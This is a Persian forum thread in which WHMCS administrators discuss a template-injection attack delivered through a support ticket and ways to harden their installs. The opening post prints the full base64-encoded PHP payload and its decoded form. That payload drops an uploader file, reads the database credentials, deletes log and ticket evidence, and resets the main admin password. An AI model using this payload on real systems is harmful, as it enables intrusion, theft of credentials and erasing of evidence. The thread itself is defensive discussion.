سلام یه سوالی در مورد امنیت این سیستم داشتم
الان سیستم من لایسنس دار و آخرین ورژنه و خیلی مسائل رو هم انجام دادم توش
امروز یه تیکت برام اومد

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlDQooIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x 2 YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW 0xMWJIUnBjR0Z5ZEM5bWIzSnRM V1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWE JzYjJGa1pYSWlQaWM3RFFwbFky aHZJQ2M4YVc1d2RYUWdkSGx3Wg0KDQpUMGlabWxzWlNJZ2JtRn RaVDBpWm1sc1pTSWdjMmw2WlQw aU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbF BTSnpkV0p0YVhRaUlHbGtQU0pm ZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSn pzTkNtbG1LQ0FrWDFCUFUxUmJK MTkxY0d3blhTQTlQU0FpVlhCcw0KDQpiMkZrSWlBcElIc05DZ2 xwWmloQVkyOXdlU2drWDBaSlRF VlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlJrbE 1SVk5iSjJacGJHVW5YVnNuYm1G dFpTZGRLU2tnZXlCbFkyaHZJQ2M4WWo1VmNHeHZZV1FnVTFWTF UwVlRJQ0VoSVR3dllqNDhZbkkN Cg0KK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUE dJK1ZYQnNiMkZrSUVkQlIwRk1J Q0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKT sNCiRta2RpciA9IEBta2RpciAo ImtpbmciLDc1NSk7DQokZm8gPSBmb3Blbigia2luZy9raW5nLn BocCIsInciKTsNCmZ3cml0ZSgk Zm8sJGNvZGUpOw0KJHRleHQ9ZmlsZV9nZXRfY29udGVudHMoIm NvbmZpZ3VyYXRpb24ucGhwIik7 DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/cGhwIiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVw bGFjZSgiPD8iLCAiIiwgJHRleHQpOw0KJHRleHQ9IHN0cl9yZX BsYWNlKCI/PiIsICIiLCAkdGV4 dCk7DQpldmFsKCR0ZXh0KTsNCiRkYj1teXNxbF9jb25uZWN0KC RkYl9ob3N0LCRkYl91c2VybmFt ZSwkZGJfcGFzc3dvcmQpb3IgZGllKCJDYW4ndCBvcGVuIGNvbm 5lY3Rpb24gdG8gTXlTUUwiKTsN Cm15c3FsX3NlbGVjdF9kYigkZGJfbmFtZSkgb3IgZGllKCJDYW 4ndCBzZWxlY3QgZGF0YWJhc2Ui KTsNCiRkZWxldGUgPSJERUxFVEUgZnJvbSB0Ymx0aWNrZXRzIF dIRVJFIHRpdGxlIGxpa2UgMHgy NTdCNzA2ODcwN0QyNTsiOw0KbXlzcWxfcXVlcnkoJGRlbGV0ZS k7DQokZGVsZXRlMiA9IkRFTEVU RSBmcm9tIHRibGFjdGl2aXR5bG9nICBXSEVSRSBpcGFkZHI9Jy IuJF9TRVJWRVJbJ1JFTU9URV9B RERSJ10uIic7IjsNCm15c3FsX3F1ZXJ5KCRkZWxldGUyKTsNCi RzYSA9IG15c3FsX3F1ZXJ5KCJV UERBVEUgYHRibGFkbWluc2AgU0VUIGBwYXNzd29yZGAgPSAnND I5N2Y0NGIxMzk1NTIzNTI0NWIy NDk3Mzk5ZDdhOTMnIFdIRVJFIGB0YmxhZG1pbnNgLmBpZGAgPT EgTElNSVQgMSA7Iik7DQokc2Ex ID0gbXlzcWxfcXVlcnkoIlVQREFURSBgdGJsYWRtaW5zYCBTRV QgYGFkbWluYCA9ICdhZG1pbicg V0hFUkUgYHRibGFkbWluc2AuYGlkYCA9MSBMSU1JVCAxIDsiKT s='));{/php}

معنیشم میشه

$mkdir = @mkdir ("king",755);
$fo = fopen("king/king.php","w");
fwrite($fo,$code);
$text=file_get_contents("configuration.php");
$text= str_replace("<?php", "", $text);
$text= str_replace("<?", "", $text);
$text= str_replace("?>", "", $text);
eval($text);
$db=mysql_connect($db_host,$db_username,$db_passwo rd)or die("Can't open connection to MySQL");
mysql_select_db($db_name) or die("Can't select database");
$delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
mysql_query($delete);
$delete2 ="DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
mysql_query($delete2);
$sa = mysql_query("UPDATE `tbladmins` SET `password` = '4297f44b13955235245b2497399d7a93' WHERE `tbladmins`.`id` =1 LIMIT 1 ;");
$sa1 = mysql_query("UPDATE `tbladmins` SET `admin` = 'admin' WHERE `tbladmins`.`id` =1 LIMIT 1 ;");

الان سوال من اینه روز به روز داره این نوع هک تغییر میکنه
خدارو شکر کاری نمیتونن بکنن
اما خب سوال من اینه چه جوری میتونم نام فایل دیتابیس رو عوض کنم
طوری که اصلا دیگه به صورت پیش فرض configuration.php نباشه ادمین رو هم همین طور
یه جورایی تیبل هارو تغییر نام بدم که امنیتش دیگه بره بسیار بالاتر

---------- Post added at 01:35 PM ---------- Previous post was at 01:11 PM ----------

راهنمای نمیکنید؟
اکای خودم تا شب بررسی میکنم همین جا برا شمام میذارم

این تاپیک رو مطالعه کنید
شاید بتونه کمک کنه
http://www.webhostingtalk.ir/f177/37062/index2.html#post343072

ممنونم میگم امنیت رو به بالاترین حد رسوندم و این آموزش شمارو من بهترشو خودم تو این انجمن نوشتم
مشکل من تغییر نام ادمین و کانفیگ و برخی تیبل هاست
که دیگه فکر نکنم بعد از این کار عمرا هک بشه

اینم یک هک جدیده و خلاقانه هم هست!
یک کدی دوستان داده بودند که داخل configuration.php قرار میدادیم و دیگه تیکت هایی که داخلش از php استفاده شده بود ، پذیرفته نمیشد! فکر می کنم اون کد کلاً مشکل تیکت رو برطرف کنه ...

این تیکت ندادا از طریق ارتباط با ما فرستاد
جالبه آدرس ایمیل و آیپیشم در اختیار قرار داد مال کشور ترکیه بود

---------- Post added at 01:52 PM ---------- Previous post was at 01:51 PM ----------

بله خیلی خلاقانست برا همین میخوام تیبل ها رو تغییر نام بدم تا طرف نتونه دستور تغییر رمز عبور ادمین رو بفرسته واسه تیبل ادمین

شما اگه راهکار بالابردنش رو میدونین تو همین تاپیک بزارین تا ما هم استفاده کنیم
ممنون

چشم ایشالا تا شب یه بلایی سرش میارم
برا بالا بردم امنیت هم میتونید
http://www.webhostingtalk.ir/f178/36259/
یه سری کارای دیگم هست مثل آپگرید به ورژن آخر
اما در مورد این هک به نظر نیازه نم فایل کانفیگ ادیت بشه تا هکر اصلا ندونه اسم فایل کانفیگ چیه که بخواد فراخوانیش کنه

دوستان عزیز
شما یک سوال رو جواب بدید که توی whmcs از bbcode استفاده شده؟ تنظیمات مربوط به bbcode داره؟
اگر جواب مثبت هست و تنظیماتی داره با استفاده از اون تنظیمات میشه جلوی php inject رو گرفت.

ایشالا تا شب تموم یافته هامو میذارم اینجا
دست به دست هم نهیم و whmcs خود را کنیم آباد

ایشالا تا شب تموم یافته هامو میذارم اینجا
دست به دست هم نهیم و whmcs خود را کنیم آباد

دست در دست هم نهیم و whmcs خود را کنیم امن و امان ;;)

ممنونم میگم امنیت رو به بالاترین حد رسوندم و این آموزش شمارو من بهترشو خودم تو این انجمن نوشتم
مشکل من تغییر نام ادمین و کانفیگ و برخی تیبل هاست
که دیگه فکر نکنم بعد از این کار عمرا هک بشه

روش جديدي نيست ،‌طرف فقط كد خودش كد كرده و به سبك قبل ارسال كرده.
اگر باگ وجود داشته باشه و مثل قبل كد اجرا بشه ، شما اسم همه فايل ها رو هم كه عوض كنيد بي فايدست ، طرف توي كد يك readdir مي نويسه و يك حلقه و ... كل فايل ها رو يكجا به دست مياره.

پس فقط باید ما رفع باگ کنیم؟

پس فقط باید ما رفع باگ کنیم؟

whmcs تون هميشه آخرين نسخه و آپديت باشه + راهكارهاي امنيتي رو رعايت كنيد.
مسئله مهمتر سرور هست ، اگر سرور امن باشه ، براحتي شل ران نميشه ، البته با اين باگ قبلي هرچقدر هم سرور امن بود باز امكان نفوذ بود (چون مستقيما امكان ران كردن فايل php وجود داشت)
تغيير جداول ديتابيس و نام فايل ها و كد كردن كانفينگ جلوي هكرهايي كه يادگرفتن اين كد رو كپي پيست كنند رو تاحدي مي گيره ولي اگه طرف واقعا طرف دانشش رو داشته باشه اينكار ها هم در عرض يك الي دو دقيقه دور زده ميشه

سلام

سیستم خوبیه امنیتش در نسخه جدید خوب قبول کنید نسخه جدید بعضی وقتا مشکل داره

ولی من به دوستان بکاپ گیری پیشنهاد میکنم مخصوصا از whmcs حتما نیازه

چون فعلا رفع نقص خوبی انجام نشده

خوب میشه نگران نباشید

دوستانی که از نسخه دیکد شده استفاده می کنند ، می تونند جا و حتی اسم پوشه configuration رو تغییر بدند.
باید فایل dbconnect رو ویرایش کنند.

دوستانی که از نسخه دیکد شده استفاده می کنند ، می تونند جا و حتی اسم پوشه configuration رو تغییر بدند.
باید فایل dbconnect رو ویرایش کنند.
عزیزم می شه بیشتر توضیح بدی ؟؟؟
ممنون

عزیزم می شه بیشتر توضیح بدی ؟؟؟
ممنون

داخل فایل dbconnect.php این کد ها رو پیدا کنید و به هرچیزی خواستید تغییر بدید :


if ( file_exists( ROOTDIR."/configuration.php" ) )
{
require( ROOTDIR."/configuration.php" );
}

موفقیت!

برای تغییر نام پوشه ادمین
بعد از تغییر اسم فولدر ، بایستی فایل config رو باز کنید و این مقدارو توش تعریف کنی :


$customadminpath = "foldername";
در نهایت هم باید فایل cron.php رو دوباره اجرا کنی!

اگه کد شده و نسخه لایسنس دار بود چیکار کنیم؟

چی کد شده بود؟
تغییر نام پوشه ربطی به کد نداره
فایل configuration هم کد شده نیست

چی کد شده بود؟
تغییر نام پوشه ربطی به کد نداره
فایل configuration هم کد شده نیست

دوست عزیز راه های بهتری هم برای رساندن تعدا پست ها به 100 می باشد ، از جمله قرار دادن آموزش های کاربردی ... نه دادن اطلاعات غلط به کاربران.


اگه کد شده و نسخه لایسنس دار بود چیکار کنیم؟



در نسخه کد شده ، راستش دقیق نمی دونم اگه فایل دیکد شده رو جایگزین فایل کد شده بکنید مشکلی پیش بیاد یا نه ، اما می تونید به سایت اصلی whmcs تیکت پشتیبانی ارسال کنید تا خودشون تغییرات لازم رو براتون انجام بدن و فایل جدید رو بهتون بدن.